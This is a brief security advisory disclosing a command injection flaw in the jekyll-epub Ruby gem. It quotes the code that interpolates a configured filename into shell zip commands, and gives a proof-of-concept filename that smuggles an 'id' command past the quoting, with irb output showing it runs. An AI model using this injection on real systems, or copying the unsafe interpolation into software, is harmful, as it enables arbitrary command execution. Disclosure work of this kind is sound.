Command injection in #{filename} for Jekyl 0.0.3
11/10/2013
Larry W.Cashdollar, @_larry0

http://rubygems.org/gems/jekyll-epub

From https://github.com/glejeune/jekyll-epub/blob/master/lib/jekyll/epub.rb


179 # Create the epub file...
180     def zip #:nodoc:
181       Dir.chdir( self.dest ) do
182         filename = self.config['epub']['name']
183         filename += ".epub" unless File.extname(filename) == ".epub"
184         $stderr.puts "** Create epub file #{filename} in #{Dir.pwd}..."
185         %x(zip -X9 \"#{filename}\" mimetype)
186         %x(zip -Xr9D \"#{filename}\" * -xi mimetype)
187       end
188     end
189   end

A filename like foobar\";id;\" will get around the \" escape for execution of zip via %x.

irb(main):017:0> filename = "test.zip\";id;\""
=> "test.zip\";id;\""
irb(main):018:0>  %x(zip -X9 \"#{filename}\" mimetype)
sh: 1: : Permission denied
=> "\nzip error: Nothing to do! (test.zip)\nuid=1000(larry) gid=1000(larry) groups=1000(larry),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),106(lpadmin),117(sambashare),119(kismet)\n"